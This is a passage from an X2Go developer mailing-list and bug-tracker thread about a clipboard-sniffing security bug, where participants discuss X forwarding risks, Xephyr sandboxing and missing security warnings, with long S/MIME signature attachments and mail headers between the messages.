Sure... but at least you can turn it of (unfortunately many programs don't do so by default, neither do they warn you what switching it on means. > > That this can indeed lead to compromise showed a recent attack we've > > had on one our institutes' machines, where sensitive information was > > caught via an X2go connection and later on used for other attacks. > Do you have any more in-depth writeup of that attack so we maybe can lear= n from > it and look at certain things more specifically? Well the problem is that I'm not really allowed to give much defaults (as you can see I also write from my private address)... Simply said... an attacker took over root on the remote system... and it seems he did just such sniffing stuff... :/ > > Now for the technical side... admittedly I don't know the details of > > how NX interacts with X... but there must be some way to achieve > > blocking of the clipboard sync. > > Even if the protocol demands to send some content,... well then simply > > hook in an clear it always (per default). >=20 > Yes, that should be possible. Its just that someone has to implement it. AFAIU, one would need to do that on the nxproxy level then? > > Now with NX I understand it's compression at the X protocol level, so > > "no JPEGs being transferred"... but where do remotes X protocol go to? > > Directly into the local X? Or is it taken by NX/X2go and rendered as > > if NX/X2go would be an X server that is displayed in a _single_ > > window of another one (i.e. like Xephyr)? > Some protocol calls are taken as is and passed to the local X, others are > "transformed", e.g. made asynchronous, bitmap-compressed, etc. I see... > Well, the remote can't take over your system afaik. But there are concern= s > about the security of ssh -X vs. -Y. Keystroke monitoring is one of those > concerns. Why don't you do the following: Not passing on any X stuff to the local X server... but staring an Xephyr server and sending it there? Admittedly I don't really know how the Xephyr server itself does things (I once tried to ask the developers but got no reply)... and if that would really work like a sandbox ... At least my hope would be (as it was before with VNC/RDP/NX)... that any evil remote... could at least only take over the one single window... and in case of Xephyr... hopefully only the single Xephyr window. First thanks for your answers... I'd propose the following now: As this bug is now cluttered all over with two different issues - clipboard sniffing and the warning when it was activated - security measures and better documentation about what NX/X2go really does I'd close this bug, and open two new ones, one for each issue... referencing that old bug... so that all topics can be discussed (perhaps fixed) in a more simple fashion. Okay? Cheers, Chris. --=-biy9qWMbz3n7guFJvWCa Content-Type: application/x-pkcs7-signature; name="smime.p7s" Content-Disposition: attachment; filename="smime.p7s" Content-Transfer-Encoding: base64 MIAGCSqGSIb3DQEHAqCAMIACAQExDzANBglghkgBZQMEAgMFADCABgkqhkiG9w0BBwEAAKCCEP4w ggV1MIIDXaADAgECAgMBAYIwDQYJKoZIhvcNAQEFBQAwVDEUMBIGA1UEChMLQ0FjZXJ0IEluYy4x HjAcBgNVBAsTFWh0dHA6Ly93d3cuQ0FjZXJ0Lm9yZzEcMBoGA1UEAxMTQ0FjZXJ0IENsYXNzIDMg Um9vdDAeFw0xMjA3MjMxNDU2NDVaFw0xNDA3MjMxNDU2NDVaMHwxITAfBgNVBAMTGENocmlzdG9w aCBBbnRvbiBNaXR0ZXJlcjEkMCIGCSqGSIb3DQEJARYVY2FsZXN0eW9Ac2NpZW50aWEubmV0MTEw LwYJKoZIhvcNAQkBFiJtYWlsQGNocmlzdG9waC5hbnRvbi5taXR0ZXJlci5uYW1lMIIBIjANBgkq hkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqv+F91K5vyBwiGFMqj6wTehWdqZnfFeXqT8g5b3qrXWL ywSzcoD9xtyoRqAgOCX+PSmBpm6pPhe31VnBtc3HcBMe4rSico9/Z2H9h1l6IMVEnyhabWzoKbE3 BFrsYJGthJCbhK072G8AhCk+5p+L+knLhQXN0Ph7MJbdY26o3M4vjsXFNbJL8TOYxo80cGD1LIh2 SUZFqaIG24TVmTW8F4jD5Z9/NEwJa8kQK+VBNHUntXYNah4Reh0jSsGnq9Pg3Hf4KC+F0IR8QgBm SnwitMFUX9UnhLEvRQxjDI1tm+h6RxfjlV7moI68Ulh7bcdPhM/z2Q16XmaY12rc85pSRQIDAQAB o4IBJjCCASIwDAYDVR0TAQH/BAIwADBWBglghkgBhvhCAQ0ESRZHVG8gZ2V0IHlvdXIgb3duIGNl cnRpZmljYXRlIGZvciBGUkVFIGhlYWQgb3ZlciB0byBodHRwOi8vd3d3LkNBY2VydC5vcmcwQAYD VR0lBDkwNwYIKwYBBQUHAwQGCCsGAQUFBwMCBgorBgEEAYI3CgMEBgorBgEEAYI3CgMDBglghkgB hvhCBAEwMgYIKwYBBQUHAQEEJjAkMCIGCCsGAQUFBzABhhZodHRwOi8vb2NzcC5jYWNlcnQub3Jn MEQGA1UdEQQ9MDuBFWNhbGVzdHlvQHNjaWVudGlhLm5ldIEibWFpbEBjaHJpc3RvcGguYW50b24u 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 +G8T/HNZ92ZCdB6K4/jc0m+YnMtHmJVABfvpAgMBAAGjgb8wgbwwDwYDVR0TAQH/BAUwAwEB/zBd BggrBgEFBQcBAQRRME8wIwYIKwYBBQUHMAGGF2h0dHA6Ly9vY3NwLkNBY2VydC5vcmcvMCgGCCsG AQUFBzAChhxodHRwOi8vd3d3LkNBY2VydC5vcmcvY2EuY3J0MEoGA1UdIARDMEEwPwYIKwYBBAGB kEowMzAxBggrBgEFBQcCARYlaHR0cDovL3d3dy5DQWNlcnQub3JnL2luZGV4LnBocD9pZD0xMDAN BgkqhkiG9w0BAQQFAAOCAgEAfwiIodoaUEnaifuhCHLzivcexDq0eVsgMLFF3sJd02Vp8cJdVFQ8 hV+5e0KRwpn9G1Gbq0aloRBTnm2IrHNuLDOm8PSe4HXBPohFqeFmQ/5WWtF6QXj3QNpKOvELW6W7 FgbmwueTuYVNl0+xHjhDgO+bDYzvuKdgAIdXfR5EHMsj75s8mZ2vtSkcRXkWlk0nbfEcbMPCVWSz vBTi86QfHjL8JxUFz90urj6CYXvwIRAY9kTqUzn53NCaIODGu+C7Wk/EmcgHvbW9otsuYg1CNEG8 /4uK9VEiqogwAOKw1Ly+ZbrVA1d5m+jcyE34UO2RpVIooqz7Nlg+6ZQrkVCHG9Ze1ozM9w8QDFJO 0BZh5eUKbL8Xx3JGV5yY9WxgY3pvXrlOL8i5ubtqhbyYDe35PpeENJSuAK+h5eeSbk698+LZFItc 0usBbKAXpS0Q65x6Sr297s797SJAq3A4iPUKh2rCqwVgyUgF2lPB3kR3arPzPDztgLymOEopJF/+ WTubJXpWYwBkuV2kYn1XNk+tg+8fklOgjndX3eVhET0jAJBMPPqjYJMEo6819g5qj09KYKeFBWxG oY/0x3bjoVlX93GyxG4UXG1tQWbfG5Ox1ADD7svPPD0hgKlfY2X83eBfpPQr8IVxQdRnJfsasZeu 1pmCE0HSbqUbmSeA5wupqAAxggLtMIIC6QIBATBbMFQxFDASBgNVBAoTC0NBY2VydCBJbmMuMR4w HAYDVQQLExVodHRwOi8vd3d3LkNBY2VydC5vcmcxHDAaBgNVBAMTE0NBY2VydCBDbGFzcyAzIFJv b3QCAwEBgjANBglghkgBZQMEAgMFAKCCAWMwGAYJKoZIhvcNAQkDMQsGCSqGSIb3DQEHATAcBgkq hkiG9w0BCQUxDxcNMTMwNzAyMTc0NzE3WjBPBgkqhkiG9w0BCQQxQgRAmbuU0gZDqEvdrpXDN8jr vkvOgY4X9Sv7bFGwaSDTQLsPZpgWCDU1ZrSvDTbRS1V0dmztOv8Fjp4hOPNpAXTv2jBqBgkrBgEE AYI3EAQxXTBbMFQxFDASBgNVBAoTC0NBY2VydCBJbmMuMR4wHAYDVQQLExVodHRwOi8vd3d3LkNB Y2VydC5vcmcxHDAaBgNVBAMTE0NBY2VydCBDbGFzcyAzIFJvb3QCAwEBgjBsBgsqhkiG9w0BCRAC CzFdoFswVDEUMBIGA1UEChMLQ0FjZXJ0IEluYy4xHjAcBgNVBAsTFWh0dHA6Ly93d3cuQ0FjZXJ0 Lm9yZzEcMBoGA1UEAxMTQ0FjZXJ0IENsYXNzIDMgUm9vdAIDAQGCMA0GCSqGSIb3DQEBAQUABIIB ACgk9ZOnAgUQq37Qzd3vo43k7NkV6bcFPj47EUSYWE2EzjEfN+uW6KblMYsQip2GG82n7hp2D1B4 91d/SVlTzW8AjWxCgJyNcJZgO/W+vxUJFRCMoMARfYHuPKNgkdYaaMrlY6hf7mNuCiIM53SmW5p8 Q2guKnIh3F5CEHHutme5gF2hiA5FORy2VpW4U7vi1hTtvneE6oOYuvcKve77rFP5ISjtB1+pDe62 UnJv3BZxtJzZdI74T5Xi5Z7sBv2+fWjTIyiPEzHDKA07Z05coir/fGcmExBRZQYsqDiJqp/Ops7R y47sikkFIai19wGUeSgwd0ZBIDUy/dftZ4342zEAAAAAAAA= --=-biy9qWMbz3n7guFJvWCa-- From calestyo@scientia.net Tue Jul 2 19:58:23 2013 Received: (at 258) by bugs.x2go.org; 2 Jul 2013 17:58:24 +0000 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on ymir.das-netzwerkteam.de X-Spam-Level: X-Spam-Status: No, score=0.0 required=5.0 tests=RCVD_IN_DNSWL_BLOCKED autolearn=ham version=3.3.2 Received: from mailgw02.dd24.net (mailgw02.dd24.net [193.46.215.43]) by ymir (Postfix) with ESMTPS id 63BF45DB13 for <258@bugs.x2go.org>; Tue, 2 Jul 2013 19:58:23 +0200 (CEST) Received: from localhost (amavis01.dd24.net [192.168.1.111]) by mailgw02.dd24.net (Postfix) with ESMTP id 3A890356B98; Tue, 2 Jul 2013 17:58:23 +0000 (GMT) X-Virus-Scanned: domaindiscount24.com mail filter gateway Received: from mailgw02.dd24.net ([192.168.1.197]) by localhost (amavis01.dd24.net [192.168.1.105]) (amavisd-new, port 10197) with ESMTP id xiTRbrbyBbVH; Tue, 2 Jul 2013 17:58:17 +0000 (GMT) Received: from [10.153.238.27] (unknown [141.84.43.125]) (using TLSv1 with cipher DHE-RSA-CAMELLIA256-SHA (256/256 bits)) (No client certificate requested) by mailgw02.dd24.net (Postfix) with ESMTPSA id 4282E35666B; Tue, 2 Jul 2013 17:58:17 +0000 (GMT) Message-ID: <1372787886.7849.104.camel@heisenberg.scientia.net> Subject: Re: [X2Go-Dev] Bug#258: Bug#258: Bug#258: SECURITY: x2goclient allows clipboard sniffing From: Christoph Anton Mitterer To: x2go-dev@lists.berlios.de, 258@bugs.x2go.org Date: Tue, 02 Jul 2013 19:58:06 +0200 In-Reply-To: References: <1372646308.18508.2.camel@heisenberg.scientia.net> <20130701114356.GP2447@cip.informatik.uni-erlangen.de> <1372682609.25918.14.camel@heisenberg.scientia.net> <20130701140132.GQ2447@cip.informatik.uni-erlangen.de> <1372728469.11367.26.camel@fermat.scientia.net> Content-Type: multipart/signed; micalg="sha512"; protocol="application/x-pkcs7-signature"; boundary="=-zytB+CyUK584+ZxoPFn9" X-Mailer: Evolution 3.4.4-3 Mime-Version: 1.0 --=-zytB+CyUK584+ZxoPFn9 Content-Type: text/plain; charset="UTF-8" Content-Transfer-Encoding: quoted-printable On Tue, 2013-07-02 at 11:10 +0400, Nable 80 wrote:=20 > > And people don't see x2go (or VNC, or rdp) like a direct access > > to their X server (as in plain X forwarding with xauth and that like). > Why do you think so? Because they have it in window and didn't specify > any option that exactly means 'turn on X11 forwarding'? To be honest, I think both are strong reasons for expecting this... as well as one easily tend to compare it with VNC (which gives you rather the "secure" screenshots)... But moreover... it's nowwhere really documented (at least where people easily see it) - I didn't find it at all. When one goes into the ssh/ssh_config manpages and read about the X forwarding options... strongly warns one about the security implications (which are basically like giving root to the remote). When one reads the xauth manpage (and the fact that there is a dedicated program which one needs to grant privileges)... one reads about what one does. With X2go/NX.. there seem to be no such emphasised warnings in the obvious places. > After all, I think that it's not a grave issue as most people use X11 > forwarding for rather trusted hosts (or just don't care). Well... don't think so... even not for the trusted ones (not to talk about untrusted hosts)... but this is probably since people have different requirements on security. > One additional note: it's possible to turn on clipboard forwarding in > RDP and VNC (and it's a very useful thing) but AFAIR in most clients > _one have to specify it implicitly_ (and sometimes there's a separate > option that allows some restricted clipboard access, for example Yes... it is... but there you have to at least enable it (even though most programs miss a strong warning on what can then easily happen...) But to be honest... the clipboard sniffing problem seems to be "boring" compared with the "direct interaction" with my local x server... at least with respect to my security thinking... Oh and no one from the developers should get me wrong: I do see that NX is very nice and great with respect to it's speed, which is probably not doable with VNC like screenshoting.... but a) I think people are not warned/told enough about what happens (technically)... and b) clear information misses... on what could actually happen (in the sense of "is it secure as it is, or can this direct communication with the local X server cause troubles - perhaps there are none... and they only issues where those with the global root window.. which seems not possible with NX? But perhaps there are!). Cheers, Chris. --=-zytB+CyUK584+ZxoPFn9 Content-Type: application/x-pkcs7-signature; name="smime.p7s" Content-Disposition: attachment; filename="smime.p7s" Content-Transfer-Encoding: base64 MIAGCSqGSIb3DQEHAqCAMIACAQExDzANBglghkgBZQMEAgMFADCABgkqhkiG9w0BBwEAAKCCEP4w ggV1MIIDXaADAgECAgMBAYIwDQYJKoZIhvcNAQEFBQAwVDEUMBIGA1UEChMLQ0FjZXJ0IEluYy4x HjAcBgNVBAsTFWh0dHA6Ly93d3cuQ0FjZXJ0Lm9yZzEcMBoGA1UEAxMTQ0FjZXJ0IENsYXNzIDMg Um9vdDAeFw0xMjA3MjMxNDU2NDVaFw0xNDA3MjMxNDU2NDVaMHwxITAfBgNVBAMTGENocmlzdG9w aCBBbnRvbiBNaXR0ZXJlcjEkMCIGCSqGSIb3DQEJARYVY2FsZXN0eW9Ac2NpZW50aWEubmV0MTEw LwYJKoZIhvcNAQkBFiJtYWlsQGNocmlzdG9waC5hbnRvbi5taXR0ZXJlci5uYW1lMIIBIjANBgkq hkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqv+F91K5vyBwiGFMqj6wTehWdqZnfFeXqT8g5b3qrXWL ywSzcoD9xtyoRqAgOCX+PSmBpm6pPhe31VnBtc3HcBMe4rSico9/Z2H9h1l6IMVEnyhabWzoKbE3 BFrsYJGthJCbhK072G8AhCk+5p+L+knLhQXN0Ph7MJbdY26o3M4vjsXFNbJL8TOYxo80cGD1LIh2 SUZFqaIG24TVmTW8F4jD5Z9/NEwJa8kQK+VBNHUntXYNah4Reh0jSsGnq9Pg3Hf4KC+F0IR8QgBm SnwitMFUX9UnhLEvRQxjDI1tm+h6RxfjlV7moI68Ulh7bcdPhM/z2Q16XmaY12rc85pSRQIDAQAB o4IBJjCCASIwDAYDVR0TAQH/BAIwADBWBglghkgBhvhCAQ0ESRZHVG8gZ2V0IHlvdXIgb3duIGNl cnRpZmljYXRlIGZvciBGUkVFIGhlYWQgb3ZlciB0byBodHRwOi8vd3d3LkNBY2VydC5vcmcwQAYD VR0lBDkwNwYIKwYBBQUHAwQGCCsGAQUFBwMCBgorBgEEAYI3CgMEBgorBgEEAYI3CgMDBglghkgB hvhCBAEwMgYIKwYBBQUHAQEEJjAkMCIGCCsGAQUFBzABhhZodHRwOi8vb2NzcC5jYWNlcnQub3Jn MEQGA1UdEQQ9MDuBFWNhbGVzdHlvQHNjaWVudGlhLm5ldIEibWFpbEBjaHJpc3RvcGguYW50b24u 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 